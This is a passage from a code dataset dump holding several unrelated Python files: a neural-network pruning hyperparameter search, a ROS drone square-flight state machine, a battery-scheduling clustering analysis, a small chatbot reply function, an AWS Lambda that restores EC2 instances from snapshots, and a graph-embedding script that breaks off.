128)')\nparser.add_argument('--gpus', metavar='DEV_ID', default=None,\n help='Comma-separated list of GPU device IDs to be used (default is to use all available devices)')\nparser.add_argument('--lr', '--learning-rate', default=0.01, type=float,\n metavar='LR', help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M',\n help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\nparser.add_argument('--validation-size', '--vs', type=float_range, default=0.1,\n help='Portion of training dataset to set aside for validation')\nparser.add_argument('--deterministic', '--det', action='store_true',\n help='Ensure deterministic execution for re-producible results.')\nparser.add_argument('--resume', default='', type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\nparser.add_argument('--method', choices=['random','tpe'],\n default='random', type=str,\n help='search method, random or tpe (default: random)')\nparser.add_argument('--pruner-constraint', '--con', action='store_true',\n help='speedup to meet the constraint')\n\n# Manual setting hyperparameters \nargs = parser.parse_args()\nprint(args)\n\nargs.dataset = 'cifar10' if 'cifar' in args.arch else 'imagenet'\nif args.gpus is not None:\n\ttry:\n\t\targs.gpus = [int(s) for s in args.gpus.split(',')]\n\texcept ValueError:\n\t\texit(1)\n\tavailable_gpus = torch.cuda.device_count()\n\tfor dev_id in args.gpus:\n\t\tif dev_id >= available_gpus:\n\t\t\texit(1)\n\t# Set default device in case the first one on the list != 0\n\ttorch.cuda.set_device(args.gpus[0])\nmodel = create_model(False, args.dataset, args.arch, device_ids=args.gpus) # Get arch state_dict\ntrain_loader, val_loader, test_loader, _ = apputils.load_data(\n args.dataset, os.path.expanduser(args.data), args.batch_size,\n args.workers, args.validation_size, args.deterministic)\n\nif(args.pruner_constraint == True):\n PrunerConstraint = True\nelse:\n PrunerConstraint = False\n\nprint('PrunerConstraint = {}'.format(PrunerConstraint))\n\nPrunerEpoch = 0\nExpected_Sparsity_Level_High = 72.5\nExpected_Sparsity_Level_Low = 67.5\ncount = 0\nglobal_min_score = 10.\n\ndef objective(space):\n global model\n global count\n global global_min_score\n \n #Explore new model\n model = create_model(False, args.dataset, args.arch, device_ids=args.gpus)\n count += 1\n # Objective function: F(Acc, Lat) = (1 - Acc.) 
+ (alpha * Sparsity)\n accuracy = 0\n alpha = 0.3 # Super-parameter: the importance of inference time\n latency = 0.0\n sparsity = 0.0\n # Training hyperparameter\n\n if args.resume:\n model, compression_scheduler, start_epoch = apputils.load_checkpoint(\n model, chkpt_file=args.resume)\n print('resume mode: {}'.format(args.resume))\n\n print(global_min_score)\n criterion = nn.CrossEntropyLoss().cuda()\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay)\n \"\"\"\n distiller/distiller/config.py\n # Element-wise sparsity\n sparsity_levels = {net_param: sparsity_level}\n pruner = distiller.pruning.SparsityLevelParameterPruner(name='sensitivity', levels=sparsity_levels)\n policy = distiller.PruningPolicy(pruner, pruner_args=None)\n scheduler = distiller.CompressionScheduler(model)\n scheduler.add_policy(policy, epochs=[0, 2, 4])\n # Local search \n add multiple pruner for each layer\n \"\"\"\n sparsity_levels = {}\n for key, value in space.items():\n sparsity_levels[key] = value\n #print(sparsity_levels)\n\n pruner = distiller.pruning.SparsityLevelParameterPruner(name='sensitivity', levels=sparsity_levels) # for SparsityLevelParameterPruner\n # pruner = distiller.pruning.SensitivityPruner(name='sensitivity', sensitivities=sparsity_levels) # for SensitivityPruner\n policy = distiller.PruningPolicy(pruner, pruner_args=None)\n lrpolicy = distiller.LRPolicy(torch.optim.lr_scheduler.StepLR(optimizer, step_size=6, gamma=0.1))\n compression_scheduler = distiller.CompressionScheduler(model)\n compression_scheduler.add_policy(policy, epochs=[PrunerEpoch])\n # compression_scheduler.add_policy(policy, starting_epoch=0, ending_epoch=38, frequency=2)\n compression_scheduler.add_policy(lrpolicy, starting_epoch=0, ending_epoch=50, frequency=1)\n \"\"\"\n distiller/example/classifier_compression/compress_classifier.py\n For each epoch:\n compression_scheduler.on_epoch_begin(epoch)\n train()\n save_checkpoint()\n compression_scheduler.on_epoch_end(epoch)\n\n train():\n For each training step:\n compression_scheduler.on_minibatch_begin(epoch)\n output = model(input)\n loss = criterion(output, target)\n compression_scheduler.before_backward_pass(epoch)\n loss.backward()\n optimizer.step()\n compression_scheduler.on_minibatch_end(epoch)\n \"\"\"\n \n local_min_score = 2.\n for i in range(args.epochs):\n compression_scheduler.on_epoch_begin(i)\n train_accuracy = train(i,criterion, optimizer, compression_scheduler)\n val_accuracy = validate() # Validate hyperparameter setting\n t, sparsity = distiller.weights_sparsity_tbl_summary(model, return_total_sparsity=True)\n compression_scheduler.on_epoch_end(i, optimizer)\n apputils.save_checkpoint(i, args.arch, model, optimizer, compression_scheduler, train_accuracy, False,\n 'hyperopt', './')\n print('Epoch: {}, train_acc: {:.4f}, val_acc: {:.4f}, sparsity: {:.4f}'.format(i, train_accuracy, val_accuracy, sparsity))\n \n score = (1-(val_accuracy/100.)) + (alpha * (1-sparsity/100.)) # objective funtion here\n if(score < global_min_score):\n global_min_score = score\n apputils.save_checkpoint(i, args.arch, model, optimizer, compression_scheduler, train_accuracy, True, 'best', './')\n\n if(score < local_min_score):\n local_min_score = score\n\n if (PrunerConstraint == True and i >= PrunerEpoch and (sparsity < Expected_Sparsity_Level_Low or sparsity > Expected_Sparsity_Level_High)):\n break \n\n test_accuracy = test() # Validate hyperparameter setting\n\n print('{} trials: score: {:.4f}, train_acc:{:.4f}, 
val_acc:{:.4f}, test_acc:{:.4f}, sparsity:{:.4f}'.format(count, \n local_min_score, \n train_accuracy, \n val_accuracy, \n test_accuracy,\n sparsity))\n\n return local_min_score\n\ndef train(epoch, criterion, optimizer, compression_scheduler):\n correct = 0\n total = 0\n total_samples = len(train_loader.sampler)\n batch_size = train_loader.batch_size\n steps_per_epoch = math.ceil(total_samples / batch_size)\n for train_step, (inputs, targets) in enumerate(train_loader):\n compression_scheduler.on_minibatch_begin(epoch, train_step, steps_per_epoch, optimizer)\n inputs, targets = inputs.cuda(), targets.cuda()\n outputs = model(inputs.cuda())\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum().data.numpy()\n loss = criterion(outputs, targets)\n compression_scheduler.before_backward_pass(epoch, train_step, steps_per_epoch, loss,\n optimizer=optimizer, return_loss_components=True)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n compression_scheduler.on_minibatch_end(epoch, train_step, steps_per_epoch, optimizer)\n accuracy = 100. * correct / total \n \n return accuracy\n\ndef validate():\n model.eval() \n correct = 0\n total = 0\n with torch.no_grad():\n for test_step, (inputs, targets) in enumerate(val_loader):\n inputs, targets = inputs.cuda(), targets.cuda()\n outputs = model(inputs)\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum().data.numpy()\n accuracy = 100. * correct / total \n return accuracy\n \ndef test():\n model.eval() \n correct = 0\n total = 0\n with torch.no_grad():\n for test_step, (inputs, targets) in enumerate(test_loader):\n inputs, targets = inputs.cuda(), targets.cuda()\n outputs = model(inputs)\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum().data.numpy()\n accuracy = 100. 
* correct / total \n return accuracy\n\ndef get_space():\n space = {}\n for name, parameter in model.named_parameters():\n if 'conv' in name and 'weight' in name:\n if (PrunerConstraint == True):\n space[name] = hp.uniform(name, 0.55, 0.85)\n else:\n space[name] = hp.uniform(name, 0.30, 0.99)\n\n return space\n\ndef Test_Best_Model(fname):\n global model\n model = create_model(False, args.dataset, args.arch, device_ids=args.gpus)\n model, compression_scheduler, start_epoch = apputils.load_checkpoint(\n model, chkpt_file=fname)\n test_accuracy = test()\n print('test acc: {:.4f}'.format(test_accuracy))\n\ndef main():\n #print('TPE Constraint')\n #Test_Best_Model('./tpe_constraint/best_best.pth.tar')\n #print('Random Constraint')\n #Test_Best_Model('./rnd_constraint/best_best.pth.tar')\n #print('Random No Constraint')\n #Test_Best_Model('./rnd_no_con/best_best.pth.tar')\n #Test_Best_Model('./tpe_no_con/best_best.pth.tar')\n #exit(0)\n\n space = get_space()\n if(args.method == 'random'):\n print('random')\n best = fmin(objective, space, algo=hyperopt.rand.suggest, max_evals=args.rounds)\n elif(args.method == 'tpe'):\n print('tpe')\n best = fmin(objective, space, algo=tpe.suggest, max_evals=args.rounds)\n else:\n print('Error parameter on method: only \\'random\\' or \\'tpe\\' is allowed')\n\n print(best)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"LAB4-2/source code/0686028/auto v2.py","file_name":"auto v2.py","file_ext":"py","file_size_in_byte":12267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"441959410","text":"#!/usr/bin/env python3\n\nimport rospy\nimport smach\nimport smach_ros\nimport mavros_msgs\nfrom std_msgs.msg import Bool\nfrom mavros_msgs import srv\nfrom mavros_msgs.srv import SetMode, CommandBool\nfrom geometry_msgs.msg import PoseStamped, TwistStamped\nfrom mavros_msgs.msg import State\nfrom mavros_msgs.msg import Mavlink\n\n\nERR = 0.1\n\ngoalPose = PoseStamped()\nmavPose = PoseStamped()\nmavState = State()\n\nrepeat = Bool()\nrepeat.data = True\n\ndef MissionFlowCallback(b):\n global repeat\n repeat = b\n\ndef setPoint(x, y, z):\n global goalPose\n goalPose.pose.position.x = x\n goalPose.pose.position.y = y\n goalPose.pose.position.z = z\n posePub.publish(goalPose)\n rate.sleep()\n\ndef stateCallback(state):\n global mavState\n mavState = state\n\ndef localCallback(pose):\n global mavPose\n mavPose.pose.position.x = pose.pose.position.x\n mavPose.pose.position.y = pose.pose.position.y\n mavPose.pose.position.z = pose.pose.position.z\n\n\n\nclass Takeoff (smach.State):\n def __init__(self):\n smach.State.__init__(self, outcomes = ['start'])\n \n def execute(self, userdata):\n rospy.loginfo('Executing state Takeoff\\n')\n \n for i in range(100):\n setPoint(0, 0, 0)\n \n while mavState.mode != \"OFFBOARD\":\n result = setModeSrv(0, \"OFFBOARD\")\n rate.sleep()\n\n while not (mavState.armed):\n arm(True)\n rate.sleep()\n \n setPoint(0, 0, 5)\n while not(abs(mavPose.pose.position.x - goalPose.pose.position.x) < ERR and abs(mavPose.pose.position.y - goalPose.pose.position.y) < ERR and abs(mavPose.pose.position.z - goalPose.pose.position.z) < ERR):\n setPoint(0, 0, 5)\n\n return 'start'\n\n\nclass Square (smach.State):\n def __init__(self):\n smach.State.__init__(self, outcomes=['rep', 'end'])\n \n def execute (self, userdata):\n rospy.loginfo('Doing one more square\\n')\n\n setPoint(0, 5, 5)\n while not(abs(mavPose.pose.position.x - goalPose.pose.position.x) < ERR and abs(mavPose.pose.position.y - 
goalPose.pose.position.y) < ERR and abs(mavPose.pose.position.z - goalPose.pose.position.z) < ERR):\n setPoint(0, 5, 5) \n\n\n setPoint(5, 5, 5)\n while not(abs(mavPose.pose.position.x - goalPose.pose.position.x) < ERR and abs(mavPose.pose.position.y - goalPose.pose.position.y) < ERR and abs(mavPose.pose.position.z - goalPose.pose.position.z) < ERR):\n setPoint(5, 5, 5)\n \n\n setPoint(5, 0, 5)\n while not(abs(mavPose.pose.position.x - goalPose.pose.position.x) < ERR and abs(mavPose.pose.position.y - goalPose.pose.position.y) < ERR and abs(mavPose.pose.position.z - goalPose.pose.position.z) < ERR):\n\n setPoint(5, 0, 5)\n\n setPoint(0, 0, 5)\n while not(abs(mavPose.pose.position.x - goalPose.pose.position.x) < ERR and abs(mavPose.pose.position.y - goalPose.pose.position.y) < ERR and abs(mavPose.pose.position.z - goalPose.pose.position.z) < ERR):\n setPoint(0, 0, 5)\n \n print(repeat)\n \n if repeat.data:\n return 'rep'\n else:\n return 'end'\n\nclass RTL(smach.State):\n def __init__(self):\n smach.State.__init__(self, outcomes=['outcome'])\n\n def execute(self, userdata):\n setPoint(0, 0, 0)\n while not(abs(mavPose.pose.position.x - goalPose.pose.position.x) < ERR and abs(mavPose.pose.position.y - goalPose.pose.position.y) < ERR and abs(mavPose.pose.position.z - goalPose.pose.position.z) < ERR):\n setPoint(0, 0, 0)\n while mavState.armed:\n arm(False) \n return 'outcome'\n\n\nrospy.init_node('SquareStateMachine', anonymous = True)\nrate = rospy.Rate(20)\n\nposePub = rospy.Publisher(\"/mavros/setpoint_position/local\", PoseStamped, queue_size = 20)\nstateSub = rospy.Subscriber(\"/mavros/state\", State, stateCallback)\nlocalNow = rospy.Subscriber(\"/mavros/local_position/pose\", PoseStamped, localCallback)\n\nMissionFlowSub = rospy.Subscriber(\"MissionFlow\", Bool, MissionFlowCallback)\n\narm = rospy.ServiceProxy(\"/mavros/cmd/arming\", CommandBool)\nsetModeSrv = rospy.ServiceProxy(\"/mavros/set_mode\", SetMode)\n\n\n\n\nsm = smach.StateMachine(outcomes = ['close'])\n\nwith sm:\n\n smach.StateMachine.add('Takeoff', Takeoff(), \n transitions={'start':'Mission'})\n \n smach.StateMachine.add('Mission', Square(),\n transitions={'rep':'Mission',\n 'end':'RTL'})\n smach.StateMachine.add('RTL', RTL(), transitions={'outcome':'close'})\n\n\nsis = smach_ros.IntrospectionServer('server_name', sm, '/SM_ROOT')\nsis.start()\noutcome = sm.execute()\nrospy.spin()\nsis.stop()\n\n\n\n","sub_path":"6a_Aula/SMpck/src/scripts/SquereSM.py","file_name":"SquereSM.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"593999082","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 30 21:24:57 2019\n\n@author: NIlab\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 29 22:27:09 2019\n\n@author: xuxue\n\"\"\"\n\n### special course的方法 应用到case\n\n\nimport scipy.io as sio\nimport numpy as np\nimport pandas as pd\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import MultipleLocator\nimport mpl_toolkits.axisartist as axisartist\nfrom mpl_toolkits.mplot3d import Axes3D #画三维图不可少\nfrom matplotlib import cm #cm 是colormap的简写\n\n### 导入数据 ###\n\npv_raw = pd.read_excel('pv_2018_filled.xlsx')\nload_raw = pd.read_excel('2018_load.xlsx')\nprice_raw = pd.read_excel('spot_price_2018.xlsx')\ntariff = sio.loadmat('DApricethreeyear.mat')\nPC_mat = sio.loadmat('PC_new')\nPD_mat = sio.loadmat('PD_new')\n\nPV_df = pd.DataFrame(np.array(pv_raw.Value_perhour).reshape(365,24))\n\nload_df 
= pd.DataFrame(np.array(load_raw[\"sum of those w/o hp.\"]).reshape(365,24))\n#load_df = pd.DataFrame(np.array(load_raw[\"sum of those w hp.\"]).reshape(365,24))\n\n#price_perhour = pd.DataFrame(np.array(price_raw.iloc[2:,9].dropna()))\n#price_perhour = list(price_raw.iloc[2:,9].dropna())\np = price_raw.iloc[2:,9].dropna()\n\nprice = []\nfor i in range(2,len(p)+3):\n    if i==1996:\n        continue\n    num = len(p[i])\n    if p[i][0] == '-':\n        number = -(int(p[i][1:num-3])+int(p[i][num-2:])*0.01)\n    else:\n        number = int(p[i][0:num-3])+int(p[i][num-2:])*0.01\n    price.append(number)\n\n\n#price_perhour = pd.DataFrame(np.array(price).reshape(365,24))\nspot_price = np.array(price)\nprice_perhour_spot = spot_price/1000 # euro/mwh to euro/kwh\n\ntariff_raw = tariff[\"DA2017\"] # the tariff matrix has three columns: spot price, DSO tariff, TSO tariff\nVAT = 0.25\n#Spot_price = tariff_raw[:,0]\nDSO_tariff = tariff_raw[:,1]\nTSO_tariff = tariff_raw[:,2]\nelectricity_tax = 0.774\nprice_perhour_retail = []\nfor i in range(8760):\n    price_perhour_retail.append((1+VAT)*(price_perhour_spot[i] + DSO_tariff[i] + TSO_tariff[i] + electricity_tax))\n#    price_perhour_retail.append((1+VAT)*(DSO_tariff[i] + TSO_tariff[i] + electricity_tax))\n\n\n#price_perhour = price_perhour_spot # case using the spot price\nprice_perhour = np.array(price_perhour_retail) # case using the retail price\n    \n#price_sell = price_perhour_spot\nprice_sell = np.array([0.32 for i in range(8760)])\n\n\n# post-process the optimization outputs\nPC_raw = PC_mat[\"P_C\"]\nPD_raw = PD_mat[\"P_D\"]\n\n# initialize the PC and PD dataframes with the day-1 data\nPC_df = pd.DataFrame(PC_raw[0,0]) # generated as a single column by default\nPC_df = PC_df.T # transpose into a row\nPD_df = pd.DataFrame(PD_raw[0,0])\nPD_df = PD_df.T\n\n# append the remaining days to the dataframes one by one \nfor i in range(1,365):\n    PC_temp = pd.DataFrame(PC_raw[0,i])\n    PC_temp = PC_temp.T\n    PC_df = pd.concat([PC_df,PC_temp])\n    PD_temp = pd.DataFrame(PD_raw[0,i])\n    PD_temp = PD_temp.T\n    PD_df = pd.concat([PD_df,PD_temp])\n    \n    \n    \n# daily PV totals\nPVinput_day = []\nfor i in range(365):\n    PVinput_day.append(PV_df.iloc[i,:].sum())\nPVinput_day = pd.DataFrame(PVinput_day)\n# daily load totals\nLoadinput_day = []\nfor i in range(365):\n    Loadinput_day.append(load_df.iloc[i,:].sum())\nLoadinput_day = pd.DataFrame(Loadinput_day)\n    \n### Classify with K-means ###\n# N: number of PV clusters, M: number of load clusters\n\nerror_rate_list = [[] for i in range(10)] # one list per PV cluster count; each holds results for the ten load cluster counts\nN_total = 10\nM_total = 10\n\nfor N in range(1,N_total+1):\n    for M in range(1,M_total+1):\n        #PV\n        estimator_PV = KMeans(n_clusters=N) # build the clusterer\n        estimator_PV.fit(PVinput_day) # cluster\n        Idx_PV = estimator_PV.labels_ # get the cluster labels\n        \n        #Load\n        estimator_Load = KMeans(n_clusters=M) # build the clusterer\n        estimator_Load.fit(Loadinput_day) # cluster\n        Idx_load = estimator_Load.labels_ # get the cluster labels\n        \n        #classification for all data by labels of PV&load\n        # classify_xu combines the PV and load labels into N*M classes\n        def classify_xu(Idx_PV,Idx_load,N,M):\n            label = [None for ii in range(365)]\n            for i in range(N):\n                for j in range(M):\n                    for t in range(365):\n                        if Idx_PV[t] == i and Idx_load[t] == j:\n                            label[t] = i*M+j\n            return label\n        \n        # label holds the class of every sample\n        label = classify_xu(Idx_PV,Idx_load,N,M);\n        \n        #A is used to save all types of data (per day), i.e. the classified samples\n        # y_opt is the 365x24 charge/discharge profile (from optimization)\n        y_opt = [[None for ii in range(24)]for jj in range(365)]\n        for i in range(365):\n            for j in range(24):\n                y_opt[i][j] = abs(PC_df.iloc[i,j])-abs(PD_df.iloc[i][j])\n        \n        A = [[None]for i in range(N*M)]\n        for i in range(365):\n            A[label[i]].append(y_opt[i])\n        for i in range(N*M):\n            A[i].pop(0)\n        #A = pd.DataFrame(A)\n        \n        # hourly means (24 values) for each class\n        # CD_classified holds the N*M per-class profiles \n        CD_classified = [[None for i in range(24)]for j in range(N*M)]\n        for i in range(N*M):\n            if A[i]==[]:\n                continue\n            for hour in range(24):\n                sum_hour = 0\n                for j in range(len(A[i])):\n                    sum_hour += A[i][j][hour]\n                CD_classified[i][hour] = sum_hour/len(A[i])\n        CD_classified_df = pd.DataFrame(CD_classified)\n        \n        # map the per-class profiles back onto the whole year via the labels; this gives the prediction y_est\n        y_est_raw = [[None for ii in range(24)]for jj in range(365)]\n        for i in range(365):\n        #    for j in range(24):\n            y_est_raw[i] = CD_classified[label[i]]\n        \n        y_opt_nd = np.array(y_opt)\n        y_opt_fl = y_opt_nd.flatten()\n        \n        y_est_nd = np.array(y_est_raw)\n        y_est_test = y_est_nd.flatten()\n        y_est = y_est_nd.flatten()\n        \n        ### SOC limitation ###\n        battery_size = 15 #kwh\n        SOC_min = 0.2*battery_size\n        SOC_max = 0.85*battery_size\n        battery_cap = SOC_max - SOC_min\n        \n        # find the first positive (charging) value in y_est\n        loc = 0\n        for i in range(len(y_est)):\n            if y_est[i] > 0:\n                charge = y_est[i]\n                if charge > battery_cap:\n                    charge = battery_cap\n                    y_est[i] = battery_cap # keep the first charge value within the battery capacity\n                loc += 1\n                break\n            if y_est[i] < 0:\n                charge = 0\n                y_est[i] = 0\n        \n        for j in range(loc,len(y_est)):\n            if charge + y_est[j] >= 0:\n                former = charge\n                charge = charge+y_est[j]\n                if charge > battery_cap:\n                    y_est[j] = battery_cap-former\n                    charge = battery_cap    \n            else:\n                y_est[j] = -charge\n                charge = 0\n        \n        ### calculate cost by different methods ###\n        load_fl = np.array(load_df).flatten()    \n        PV_fl = np.array(PV_df).flatten()  \n        #price_perhour = np.array(price_perhour)\n        final_opt = -PV_fl + load_fl + y_opt_fl  \n        final_est = -PV_fl + load_fl + y_est \n        \n        cost_opt = []\n        cost_est = [] \n        cost_load = []\n        \n        for i in range(len(final_opt)) :  \n            if final_opt[i]>=0: # >0 means buying electricity\n                cost_opt.append(final_opt[i]*price_perhour[i])\n            else:\n                cost_opt.append(final_opt[i]*price_sell[i])\n        \n        for i in range(len(final_est)) :  \n            if final_est[i]>=0: # >0 means buying electricity\n                cost_est.append(final_est[i]*price_perhour[i])\n            else:\n                cost_est.append(final_est[i]*price_sell[i])\n        \n        for i in range(len(load_fl)) :  \n            if load_fl[i]>=0: # >0 means buying electricity\n                cost_load.append(load_fl[i]*price_perhour[i])\n            else:\n                cost_load.append(load_fl[i]*price_sell[i])  \n        \n        cost_opt_sum = sum(cost_opt)\n        cost_est_sum = sum(cost_est)\n        cost_load_sum = sum(cost_load)\n        error_rate = ((cost_est_sum - cost_opt_sum)/cost_opt_sum)*100\n        error_rate_list[N-1].append(error_rate)\n\n\n\n#plot\n# x,y coordinate grids\nX = [[j for i in range(10)] for j in range(1,11)]\nY = [[i for i in range(1,11)] for j in range(10)]\nX = np.array(X)\nY = np.array(Y)\n\nerror_rate_list_np = np.array(error_rate_list)\n\nfig = plt.figure()\nax = plt.axes(projection='3d')\nax.plot_surface(X,Y,error_rate_list_np,cmap='rainbow')\n\nax.invert_yaxis() # reverse the y axis\n# x-axis tick spacing of 1\nx_major_locator=MultipleLocator(1)\n# y-axis tick spacing of 1\ny_major_locator=MultipleLocator(1)\n# apply the tick spacing\nax.xaxis.set_major_locator(x_major_locator)\nax.yaxis.set_major_locator(y_major_locator)\nplt.title('Different combinations of N and M',fontsize=20)\nax.set_zlabel('Error Rate (%)',fontsize=20)  # axis labels\nax.set_ylabel('M (load)',fontsize=20)\nax.set_xlabel('N (PV)',fontsize=20)\n\ner_df = pd.DataFrame(error_rate_list_np)\ner_df.to_excel(\"er100.xlsx\")\n\n\n\n","sub_path":"Program_data analysis/case/new_10_10class.py","file_name":"new_10_10class.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"454299985","text":"def get_answer(raw_question):\n    # normalize case and strip trailing punctuation so that a question like 'привет!' still matches\n    question = str(raw_question).lower().strip('!?.')\n    answers = {'привет': 'И тебе привет!', 'как дела': 'Лучше всех', 'пока': 'Увидимся'}\n    if question in answers:\n        
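# known question: print the canned reply (answers.get returns it by key)\n        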
print(answers.get(question))\n\n\nif __name__ == '__main__':\n get_answer('привет!')\n get_answer('Как дела')\n get_answer('ПоКа')\n","sub_path":"answers.py","file_name":"answers.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"235772895","text":"import boto3\n\ndef restoreSnapshot(event, context):\n instanceName = event['instanceName']\n \n stsClient = boto3.client('sts')\n identity = stsClient.get_caller_identity()\n ownerId = identity['Account']\n \n ec2Client = boto3.client('ec2')\n mostRecentSnapshot = None\n mostRecentCmdId = None\n snapshotsByCommandId = {}\n filters = [ { 'Name': 'tag:TAG-Name', 'Values': [ instanceName ] } ]\n snapshotsResult = ec2Client.describe_snapshots(Filters=filters, OwnerIds=[ownerId], MaxResults=1000)\n for snapshot in snapshotsResult['Snapshots']:\n cmdId = list(filter(lambda x: x['Key'] == 'CommandId', snapshot['Tags']))[0]['Value']\n if cmdId not in snapshotsByCommandId:\n snapshotsByCommandId[cmdId] = []\n snapshotsByCommandId[cmdId].append(snapshot)\n if mostRecentSnapshot is None or snapshot['StartTime'] > mostRecentSnapshot['StartTime']:\n mostRecentSnapshot = snapshot\n mostRecentCmdId = cmdId\n print('most recent cmd: ' + str(mostRecentCmdId) + ', snapId: ' + mostRecentSnapshot['SnapshotId'])\n if mostRecentCmdId is None:\n raise Exception('No snapshots found for instance ' + instanceName)\n \n ec2Resource = boto3.resource('ec2')\n name = instanceName\n desc = 'Made from instance {}, snapshots'.format(instanceName)\n iType = 't2.micro'\n virt = 'hvm'\n subnet = vpc = root = keyName = ''\n groups = []\n bdm = []\n tagSpec = []\n iamInstProfile = {}\n for snapshot in snapshotsByCommandId[mostRecentCmdId]:\n name += '-' + snapshot['SnapshotId']\n desc += ' ' + snapshot['SnapshotId']\n for tag in snapshot['Tags']:\n if tag['Key'] == 'SecurityGroupIds': groups = tag['Value'].split(',')\n if tag['Key'] == 'InstanceType': iType = tag['Value']\n if tag['Key'] == 'VirtualizationType': virt = tag['Value']\n if tag['Key'] == 'SubnetId': subnet = tag['Value']\n if tag['Key'] == 'VpcId': vpc = tag['Value']\n if tag['Key'] == 'RootDeviceName': root = tag['Value']\n if tag['Key'] == 'KeyName': keyName = tag['Value']\n if tag['Key'] == 'DeviceName': deviceName = tag['Value']\n bdm.append({'DeviceName': deviceName, 'Ebs': {'SnapshotId': snapshot['SnapshotId'], 'VolumeType': 'gp2'}})\n if len(tagSpec) == 0:\n spec = { 'ResourceType': 'instance', 'Tags': [] }\n for tag in snapshot['Tags']:\n if tag['Key'].startswith('TAG-'):\n newTag = tag['Key'][4:]\n value = tag['Value']\n if newTag == 'Name':\n value = tag['Value'] + ' RESTORED'\n spec['Tags'].append({ 'Key': newTag, 'Value': value })\n tagSpec.append(spec)\n if len(iamInstProfile) == 0:\n iam = list(filter(lambda x: x['Key'] == 'IamInstanceProfile', snapshot['Tags']))[0]['Value'].split(',')\n iamInstProfile = { 'Arn': iam[0] } # 'Name': iam[1]\n image = ec2Resource.register_image(Name=name, Description=desc, RootDeviceName=root, BlockDeviceMappings=bdm, VirtualizationType=virt)\n print(image.image_id)\n \n ec2Resource.create_instances(\n ImageId=image.image_id,\n MinCount=1,\n MaxCount=1,\n KeyName=keyName,\n InstanceType=iType,\n IamInstanceProfile=iamInstProfile,\n NetworkInterfaces=[{'SubnetId': subnet, 'DeviceIndex': 0, 'AssociatePublicIpAddress': True, 'Groups': groups}],\n #SecurityGroupIds=groups,\n TagSpecifications=tagSpec\n 
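# tagSpec was rebuilt above from the snapshot's TAG-* tags, with ' RESTORED' appended to the Name tag\n    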
)\n","sub_path":"AWS/lambda/RestoreSnapshot.py","file_name":"RestoreSnapshot.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"501270403","text":"# %% [markdown]\n# # Imports\nimport os\nimport random\nfrom operator import itemgetter\nfrom pathlib import Path\n\nimport colorcet as cc\nimport matplotlib.colors as mplc\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom graspy.cluster import AutoGMMCluster, GaussianCluster\nfrom graspy.embed import AdjacencySpectralEmbed, LaplacianSpectralEmbed\nfrom graspy.plot import gridplot, heatmap, pairplot\nfrom graspy.utils import symmetrize\nfrom src.data import load_metagraph\nfrom src.embed import ase, lse, preprocess_graph\nfrom src.graph import MetaGraph\nfrom src.io import savefig, saveobj, saveskels\nfrom src.visualization import (\n bartreeplot,\n get_color_dict,\n get_colors,\n remove_spines,\n sankey,\n screeplot,\n)\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\nSAVESKELS = True\nSAVEFIGS = True\nBRAIN_VERSION = \"2020-01-21\"\n\nsns.set_context(\"talk\")\n\nbase_path = Path(\"maggot_models/data/raw/Maggot-Brain-Connectome/\")\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=SAVEFIGS, **kws)\n\n\ndef stashskel(name, ids, labels, colors=None, palette=None, **kws):\n saveskels(\n name,\n ids,\n labels,\n colors=colors,\n palette=None,\n foldername=FNAME,\n save_on=SAVESKELS,\n **kws,\n )\n\n\ndef threshold_sweep(edgelist_df, max_pair_edgelist_df, start=0, stop=0.3, steps=20):\n threshs = np.linspace(start, stop, steps)\n rows = []\n for threshold in threshs:\n thresh_df = max_pair_edge_df[max_pair_edge_df[\"weight\"] > threshold]\n p_sym = len(thresh_df[thresh_df[\"edge pair counts\"] == 2]) / len(thresh_df)\n p_edges_left = (\n thresh_df[\"edge pair counts\"].sum()\n / max_pair_edge_df[\"edge pair counts\"].sum()\n )\n temp_df = edgelist_df[edgelist_df[\"max_weight\"] > threshold]\n p_syns_left = temp_df[\"weight\"].sum() / edgelist_df[\"weight\"].sum()\n row = {\n \"threshold\": threshold,\n \"Prop. paired edges symmetric\": p_sym,\n \"Prop. edges left\": p_edges_left,\n \"Prop. 
